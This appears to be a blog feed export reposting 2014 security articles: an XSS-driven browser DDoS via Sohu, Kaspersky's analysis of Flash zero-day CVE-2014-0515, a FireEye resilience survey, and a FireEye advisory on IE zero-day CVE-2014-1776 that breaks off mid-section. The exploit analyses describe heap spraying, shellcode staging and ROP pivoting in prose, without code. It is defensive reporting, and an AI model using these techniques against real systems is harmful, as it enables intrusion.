<span style="color: #747474; font-family: PT Sans, Arial, Helvetica, sans-serif; font-size: x-small;"><span style="line-height: 20px;"><a href="http://resources.infosecinstitute.com/step-step-guide-application-security-penetration-testing/" target="_blank">http://resources.infosecinstitute.com/step-step-guide-application-security-penetration-testing/</a></span></span>Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com1tag:blogger.com,1999:blog-4996980881256752769.post-68694677774393321032014-04-28T21:30:00.002-07:002014-04-28T21:30:30.491-07:00[infosecurity-magazine] China's Google Equivalent, Sohu, Used For Massive DDoS<h2 class="article-intro" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 1.3em; font-weight: 400; line-height: 1.4em; margin: 0px 0px 14px;">
Sohu.com, China’s eighth-largest website and currently the 27th most-visited website in the world, was the unwitting originator of a massive distributed denial-of-service (DDoS) attack earlier in the month, which was carried out using traffic hijacking techniques. In all, the application-layer attack consisted of more than 20 million GET requests originating from the browsers of 22,000+ internet users – all turned into unwilling accomplices by the offender.<a name='more'></a></h2>
<div class="article-content" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 12px;">
<div style="line-height: 1.4em; margin-bottom: 12px;">
Incapsula said that the Sohu.TV video streaming portion of the website was used to enable the DDoS attack. </div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
The attack should serve as an object lesson to other tech giants. For instance, Google, with YouTube as its subsidiary, has an analogous business model. “While being relatively unfamiliar to Western audiences, Sohu (Chinese for ‘Search-fox’), is a local and global powerhouse,” wrote Incapsula security researchers Ofer Gayer and Ronen Atias, in a<a href="http://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html" style="color: #e5141a; outline: none;" target="_blank"> blog</a>. “This rapidly growing $2.5 billion organization provides a variety of search and content solutions.”<br /><br />Incapsula uncovered the source of the browser-based DDoS attack and the replicated persistent cross-site scripting (XSS) vulnerability that allowed it to occur, and the Sohu team responded with a rapid patch that fixed the security hole, rendering this particular browser-based botnet completely useless.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
Sohu, as a high-profile video content provider, allows its users to sign in with their own profiles. The DDoS attack was enabled by a persistent XSS vulnerability that allowed the offender to inject JavaScript code into the image tag associated with the profile image. As a result, every time the image was used on one of the the site’s pages (e.g., in the comment section), the malicious code was also embedded inside, waiting to be executed by each future visitor to that page.<br /><br />As a result, each time a legitimate visitor landed on that page, his or her browser automatically executed the injected JavaScript, which in turn injected a hidden iframe tag with the address of the attacker's command-and-control domain. There, an Ajax-scripted DDoS tool hijacked the browser, forcing it to issue a DDoS request at a rate of one request per second.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
The video is the key to success for this attack.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
“Obviously one request per second is not a lot,” the researchers said. “However, when dealing with video content of 10, 20 and 30 minutes in length, and with thousands of views every minute, the attack can quickly become very large and extremely dangerous. Knowing this, the offender strategically posted comments on popular videos, effectively created a self-sustaining botnet comprising 10s of thousands of hijacked browsers, operated by unsuspecting human visitors who were only there to watch a few funny cat videos.”</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
By intercepting the malicious requests, Incapsula was able to track the source of the attack to Sohu by replacing the content of the target URL with a snippet of its own JavaScript.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
While this issue is patched, the attackers could be gearing up for a new, and perhaps bigger, offensive.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
“It should be noted that…the original DDoS tool on the attacker’s C&C domain was replaced with a much more robust version,” said Gayer and Atias. “This leads us to believe that what we saw yesterday was a sort of proof-of-concept test run. The current code is not only much more sophisticated, but it is also built for keeping track of the attack, for what seems like billing purposes. From the looks of it, someone is now using [this] to set up a chain of botnets for hire."</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
<a href="http://www.infosecurity-magazine.com/view/38137/chinas-google-equivalent-sohu-used-for-massive-ddos/" target="_blank">http://www.infosecurity-magazine.com/view/38137/chinas-google-equivalent-sohu-used-for-massive-ddos/</a></div>
</div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-62125711520196446362014-04-28T21:29:00.001-07:002014-04-28T21:29:09.731-07:00[securelist] New Flash Player 0-day (CVE-2014-0515) used in watering-hole attacks<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
In mid-April we detected two new SWF exploits. After some detailed analysis it was clear they didn't use any of the vulnerabilities that we already knew about. We sent the exploits off to Adobe and a few days later got confirmation that <a href="http://helpx.adobe.com/security/products/flash-player/apsb14-13.html" style="color: #3751ab; text-decoration: none;">they did indeed use a 0-day vulnerability that was later labeled as CVE-2014-0515</a>. The vulnerability is located in the Pixel Bender component, designed for video and image processing.</div>
<a name='more'></a><br />
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
We received a sample of the first exploit on April 14, while a sample of the second came on April 16. The first exploit was initially recorded by KSN on April 9, when it was detected by a generic heuristic signature. There were numerous subsequent detections on April 14 and 16. In other words, we succeeded in detecting a previously unknown threat using heuristics.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
According to KSN data, these exploits were stored as movie.swf and include.swf at an infected site. The only difference between the two pieces of malware is their shellcodes. It should be noted that the second exploit (include.swf) wasn't detected using the same heuristic signature as the first, because it contained a unique shellcode.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
Each exploit comes as an unpacked flash video file. The Action Script code inside was neither obfuscated nor encrypted.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
As is usually the case with this kind of exploit, the first stage is a heap spray - preparing the dynamic memory for exploitation of the vulnerability. The exploits are also designed to check the OS version. If Windows 8 is detected, a slightly modified byte-code of the Pixel Bender component is used.</div>
<div class="c" style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em; text-align: center;">
<img alt="" border="0" height="252" src="http://www.securelist.com/en/images/pictures/klblog/8213.png" style="border: 0px; margin: 0px;" width="316" /></div>
<div align="center" style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
<i>A fragment of the vulnerable Pixel Bender code (the data in the red box is changed according to system version)</i></div>
<div class="c" style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em; text-align: center;">
<img alt="" border="0" height="483" src="http://www.securelist.com/en/images/pictures/klblog/8214.png" style="border: 0px; margin: 0px;" width="311" /></div>
<div align="center" style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
<i>Fragment of the decompiled exploit code</i></div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
Next comes the actual exploitation of the vulnerability, namely modification of one of the indices in the table of methods/virtual functions.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
Interestingly, both exploits have two shellcodes. The first is similar in both applications; it is quite short and prepares the memory for the successful functioning of the second shellcode.</div>
<div class="c" style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em; text-align: center;">
<a href="http://www.securelist.com/en/images/pictures/klblog/8215.png" style="color: #3751ab; text-decoration: none;"><img alt="" border="0" height="495" src="http://www.securelist.com/en/images/pictures/klblog/8216.png" style="border: 0px; margin: 0px;" width="650" /></a></div>
<div align="center" style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
<i>A fragment of the first shellcode debugged in WinDBG</i></div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
Firstly, the current memory is marked as read, write and execute with the API function VirtualProtect, and then additional memory is allocated using VirtualAlloc. The second shellcode is copied to this memory and control is transferred to it. The initialization of API functions and transfer of the control to the second shellcode appear in red boxes in the screenshot above.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
The exploits' second shellcodes differ significantly.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
The exploit that we detected first has a standard shellcode (movie.swf). It performs a search of system libraries in the memory, and then downloads and runs the payload. Unfortunately, the link turned out to be inactive at the time of our research.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
<img alt="" border="0" height="524" src="http://www.securelist.com/en/images/pictures/klblog/8217.png" style="border: 0px; margin: 0px;" width="639" /></div>
<div align="center" style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
<i>Fragment of the movie.swf exploit's second shellcode responsible for the download and launch of the payload</i></div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
In the other exploit - include.swf - the second shellcode was unusual. It receives the base DLL address for flash10p.ocx, searching it for specific fragments and interacts with the ciscompeaddin5x0 - Cisco MeetingPlace Express Add-In version 5x0. This add-in is used by web-conference participants to view documents and images from presenter's screen. It should be noted that the exploit will not work if the required versions of Adobe Flash Player ActiveX and Cisco MPE are not present on the system.</div>
<div class="c" style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em; text-align: center;">
<a href="http://www.securelist.com/en/images/pictures/klblog/8218.png" style="color: #3751ab; text-decoration: none;"><img alt="" border="0" height="483" src="http://www.securelist.com/en/images/pictures/klblog/8219.png" style="border: 0px; margin: 0px;" width="650" /></a></div>
<div align="center" style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
<i>Fragment of the include.swf exploit's second shellcode</i></div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
It appears that part of the information for the exploit include.swf is passed on from outside. According to KSN data, the referer to include.swf points to another SWF file: stream.swf. At the same time, the referer of the first exploit - movie.swf - points to index.php located in the same folder as the exploit (see below). We couldn't establish the exact payload of the exploit include.swf due to a lack of data relayed from the landing page and/or other exploits.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
We are sure that all these tricks were used in order to carry out malicious activity against a very specific group of users without attracting the attention of security solutions. We believe that the Cisco add-in mentioned above may be used to download/implement the payload as well as to spy directly on the infected computer.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
Both the exploits detected by us spread from a site located at <a href="http://jpic.gov.sy/" style="color: #3751ab; text-decoration: none;">http://jpic.gov.sy/</a>. The site was launched back in 2011 by the Syrian Ministry of Justice and was designed as an online forum for citizens to complain about law and order violations. We believe the attack was designed to target Syrian dissidents complaining about the government. The site <a href="http://ae.aliqtisadi.com/%D9%87%D8%A7%D9%83%D8%B1-%D9%8A%D8%AE%D8%AA%D8%B1%D9%82-%D9%85%D9%88%D8%A7%D9%82%D8%B9-%D8%AD%D9%83%D9%88%D9%85%D9%8A%D8%A9-%D8%B3%D9%88%D8%B1%D9%8A%D8%A9/" style="color: #3751ab; text-decoration: none;">was hacked</a> in September 2013, something the alleged hacker announced on his <a href="https://twitter.com/olivertuckedout" style="color: #3751ab; text-decoration: none;">twitter account</a>.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
The link to these exploits is as follows: http://jpic.gov.sy/css/images/_css/***********. When we entered the site, the installed malware payloads were already missing from the "_css" folder. We presume the criminals created a folder whose name doesn't look out of place on an administration resource, and where they loaded the exploits. The victims were probably redirected to the exploits using a frame or a script located at the site. To date, April 28, the number of detections by our products has exceeded 30. They were detected on the computers of seven unique users, all of them in Syria, which is not surprising considering the nature of the site. Interestingly, all the attacked users entered the website using various versions of Mozilla Firefox.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
It's likely that the attack was carefully planned and that professionals of a pretty high caliber were behind it. The use of professionally written 0-day exploits that were used to infect a single resource testifies to this.</div>
<a href="https://www.blogger.com/null" name="readmore" style="background-color: #eeeeee; color: #3751ab; font-family: arial; font-size: 14px; line-height: 19.600000381469727px;"></a><span style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px;"></span><br />
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
Moreover, while the first exploit is pretty standard and can infect practically any unprotected computer, the second exploit (include.swf) only functions properly on computers where Adobe Flash Player 10 ActiveX and Cisco MeetingPlace Express Add-In are installed. The Flash Player Pixel Bender component, which <a href="http://www.adobe.com/devnet/pixelbender.html" style="color: #3751ab; text-decoration: none;">Adobe no longer supports</a>, was used as the attack vector. The authors were counting on the developers not finding a vulnerability in that component and that the exploit would remain active for longer. All this suggests that the attackers were not targeting users en masse.</div>
<div style="background-color: #eeeeee; font-family: arial; font-size: 14px; line-height: 19.600000381469727px; margin-bottom: 1em;">
<a href="http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks" target="_blank">http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-64031388156175867712014-04-28T21:27:00.001-07:002014-04-28T21:27:08.168-07:00[fireeye] The Road to Resilience: How Cybersecurity is Moving from the Back Office to the Boardroom<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
For too long, our industry has framed cybersecurity as a technical issue.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
We have measured success on the volume of malware we detect and block, not how we respond to the threats that matter. We have taken a one-size-fits-all approach to security incidents, regardless of who’s attacking, how they work, and what they’re after. We have rarely engaged other business units when responding to incidents — and when we do, we fixate on the technical details rather than weighing their business impact.</div>
<a name='more'></a><br />
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Yes, cybersecurity has a technical component. But more than anything, it is a business issue.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Fortunately, the old mindset is changing. Under the banner of “cyber resilience,” security leaders are beginning to acknowledge that cybersecurity must evolve. Striving to ward off attacks is no longer enough — organizations must also respond to incidents with a focus on managing their business impact.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
To gauge how far along organizations in the Europe, Middle East, and Africa (EMEA) are in this evolution, FireEye recently asked 25 security leaders across the region about their experience and perceptions. Their answers reveal a sizable divide among in both awareness and maturity when it comes to cyber resilience.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<strong>Breaches Increasingly Routine</strong><br />Not surprisingly, EMEA security leaders say that cyber breaches are increasingly routine. In our survey, 44 percent of organizations said they had breached at least once per year. And that total probably understates the problem — a full 28 percent were not sure whether they have been breached.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px; text-align: center;">
<a href="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img1.png" style="color: #4298b5; font-weight: bold; text-decoration: none;"><img alt="img1" class="aligncenter wp-image-5361" height="203" src="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img1.png" style="border: 0px; max-width: 98%;" width="587" /></a></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<strong>All threats viewed equally — regardless of risk or impact</strong><br />A solid majority of respondents (68 percent) said they “always” care about breaches. Only 16 percent said their level of concern depends on the severity of the incident. This lopsided statistic suggests that IT professionals are not yet looking at breaches from the perspective of risk or impact.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px; text-align: center;">
<a href="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img2.png" style="color: #4298b5; font-weight: bold; text-decoration: none;"><img alt="img2" class="aligncenter wp-image-5362" height="328" src="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img2.png" style="border: 0px; max-width: 98%;" width="503" /></a></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<strong>Priorities misaligned in incident response</strong><br />We see the same lack of business alignment in organizations’ responses to breaches. When a breach occurs, 84 percent of those in our EMEA survey notify relevant business leaders, and 76 percent notify company executives. We often hear that companies are looking for security leaders to engage at a business level. But if business leaders and executives are still being notified about most breaches, we’re still treating security as a technical problem.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px; text-align: center;">
<a href="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img3.png" style="color: #4298b5; font-weight: bold; text-decoration: none;"><img alt="img3" class="aligncenter wp-image-5363" height="284" src="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img3.png" style="border: 0px; max-width: 98%;" width="469" /></a></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Our survey found a split in where security teams focus their response. About 60 percent base their response plan around all IT systems, and 40 percent focus on critical systems and resources. This response, too, suggests that organizations see many breaches as a technical problem rather than a business problem.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Along the same lines, communications, public relations, and business teams are typically far less engaged in incident responses than IT security and technical teams, executives, and HR departments. If cyber resilience is about enabling business resilience, then business teams should play an equally critical role in incident response.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
When engaging with executives, we in the security community do not seem to be taking a risk-based approach. And clearly, we are not speaking executives’ language: the impact of a breach on the company’s financial results.</div>
<div align="center" style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<em><strong>Who is included in incident response plans?</strong></em></div>
<div align="center" style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px; text-align: center;">
<em><strong><a href="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img4.png" style="color: #4298b5; text-decoration: none;"><img alt="img4" class="aligncenter wp-image-5364" height="380" src="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img4.png" style="border: 0px; max-width: 98%;" width="578" /></a></strong></em></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<strong>Moving toward a risk-based security framework</strong><br />Most security leaders leverage at least one security framework or standard — and in most cases, they leverage two or more. These frameworks include best practices defining what to protect, how to protect it, and how to monitor deployed controls. These features make the frameworks valuable tools to help define strategies and gauge their effectiveness. But adoption of ISO27005 — which focuses on business-risk assessment — is far behind that of ISO27001.</div>
<div align="center" style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px; text-align: center;">
<strong><em>Adopted security frameworks</em></strong><a href="http://www.fireeye.com/blog/wp-content/uploads/2014/04/Untitled.png" style="color: #4298b5; font-weight: bold; text-decoration: none;"><img alt="Untitled" class="aligncenter wp-image-5365" height="275" src="http://www.fireeye.com/blog/wp-content/uploads/2014/04/Untitled.png" style="border: 0px; max-width: 98%;" width="536" /></a></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<strong>Leveraging automation</strong><br />Just about every security leader would like more resources. But most of us must make the most of what we have.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
What is clear from our survey is that incident response is consuming the biggest share of time and resources.</div>
<div align="center" style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px; text-align: center;">
<strong><em>Security tasks that consume the most time and resources (weighted average)</em></strong><a href="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img5.png" style="color: #4298b5; font-weight: bold; text-decoration: none;"><img alt="img5" class="aligncenter wp-image-5367" height="192" src="http://www.fireeye.com/blog/wp-content/uploads/2014/04/img5.png" style="border: 0px; max-width: 98%;" width="582" /></a></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The volume of attacks is rising. And IT systems are playing an increasingly critical role in business. So having well-defined and tested response capabilities that leverage automation would seem a key component to cyber resilience.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<strong>Bolstering cyber resilience</strong><br />Cyber security is, and will remain, an evolution. Everyone is on their own journey along the maturity curve. Security leaders must evaluate their place along that curve based on their perceptions of risks and the controls they need to put in place.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Cyber resilience recognizes that prevention is only part of the solution. Organizations must realize the following:</div>
<ul style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 16.003000259399414px; margin: 0px; padding: 0px;">
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">Businesses will increasingly measure security leaders not just on what they stop or let through, but on how they respond to what does get through.</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">A breach can happen in seconds, yet the exfiltration takes hours or days and can last for months.<a href="http://www.fireeye.com/blog/corporate/2014/04/the-road-to-resilience-how-cybersecurity-is-moving-from-the-back-office-to-the-boardroom.html#_ftn1" style="color: #4298b5; font-weight: bold; text-decoration: none;" title="">[1]</a></li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">When it comes to measuring business impact, not all breaches are equal.</li>
</ul>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
At the same time, organizations must retool their strategies to better discover and respond to security incidents. This shift requires:</div>
<ul style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 16.003000259399414px; margin: 0px; padding: 0px;">
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">Having a documented, regularly reviewed, and well-tested cyber response strategy that includes both the business and technical response plans.</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">Reducing the time and costs involved in response.</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">Being able to qualify the business risk of the incident. By better aligning cyber strategies to business drivers and business risk, security leaders can have a bigger business impact and increase their relevance to executives.</li>
</ul>
<span style="color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: x-small;"><span style="line-height: 18.200000762939453px;"><a href="http://www.fireeye.com/blog/corporate/2014/04/the-road-to-resilience-how-cybersecurity-is-moving-from-the-back-office-to-the-boardroom.html" target="_blank">http://www.fireeye.com/blog/corporate/2014/04/the-road-to-resilience-how-cybersecurity-is-moving-from-the-back-office-to-the-boardroom.html</a></span></span>Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-31382064008064699802014-04-28T21:26:00.000-07:002014-04-28T21:26:15.121-07:00[fireeye] New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<span style="color: black; font-weight: bold;">Summary</span></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
FireEye Research Labs identified a new Internet Explorer (IE) zero-day exploit used in targeted attacks. The vulnerability affects IE6 through IE11, but the attack is targeting IE9 through IE11. This zero-day bypasses both ASLR and DEP. Microsoft has assigned CVE-2014-1776 to the vulnerability and released <a href="https://technet.microsoft.com/en-US/library/security/2963983" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">security advisory</a> to track this issue.</div>
<a name='more'></a><br />
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Threat actors are actively using this exploit in an ongoing campaign which we have named “Operation Clandestine Fox.” However, for many reasons, we will not provide campaign details. But we believe this is a significant zero day as the vulnerable versions represent about a quarter of the total browser market. We recommend applying a patch once available.<br />According to <a href="http://www.netmarketshare.com/browser-market-share.aspx?qprid=2&qpcustomd=0&qpsp=168&qpnp=12&qptimeframe=M" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">NetMarket Share</a>, the market share for the targeted versions of IE in 2013 were:</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
IE 9 13.9%<br />IE 10 11.04%<br />IE 11 1.32%</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Collectively, in 2013, the vulnerable versions of IE accounted for 26.25% of the browser market. The vulnerability, however, does appear in IE6 through IE11 though the exploit targets IE9 and higher.</div>
<h2 style="background-color: white; color: #c8102e; font-family: arial, helvetica, clean, sans-serif; font-size: 18px; font-weight: normal; margin: 0px 0px 10px; padding: 0px 0px 4px;">
The Details</h2>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The exploit leverages a previously unknown use-after-free vulnerability, and uses a well-known <a href="http://www.fireeye.com/blog/technical/cyber-exploits/2013/10/aslr-bypass-apocalypse-in-lately-zero-day-exploits.html" style="color: #4298b5; font-weight: bold; text-decoration: none;">Flash exploitation technique</a> to achieve arbitrary memory access and bypass Windows’ ASLR and DEP protections.</div>
<h2 style="background-color: white; color: #c8102e; font-family: arial, helvetica, clean, sans-serif; font-size: 18px; font-weight: normal; margin: 0px 0px 10px; padding: 0px 0px 4px;">
Exploitation</h2>
<h3 style="background-color: white; color: #1d252d; font-family: arial, helvetica, clean, sans-serif; font-size: 16px; font-weight: normal; margin: 0px 0px 10px; padding: 0px;">
• Preparing the heap</h3>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The exploit page loads a Flash SWF file to manipulate the heap layout with the common technique <a href="http://en.wikipedia.org/wiki/Heap_feng_shui" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">heap feng shui</a>. It allocates Flash vector objects to spray memory and cover address <em>0×18184000</em>. Next, it allocates a vector object that contains a <em>flash.Media.Sound()</em> object, which it later corrupts to pivot control to its ROP chain.</div>
<h3 style="background-color: white; color: #1d252d; font-family: arial, helvetica, clean, sans-serif; font-size: 16px; font-weight: normal; margin: 0px 0px 10px; padding: 0px;">
• Arbitrary memory access</h3>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
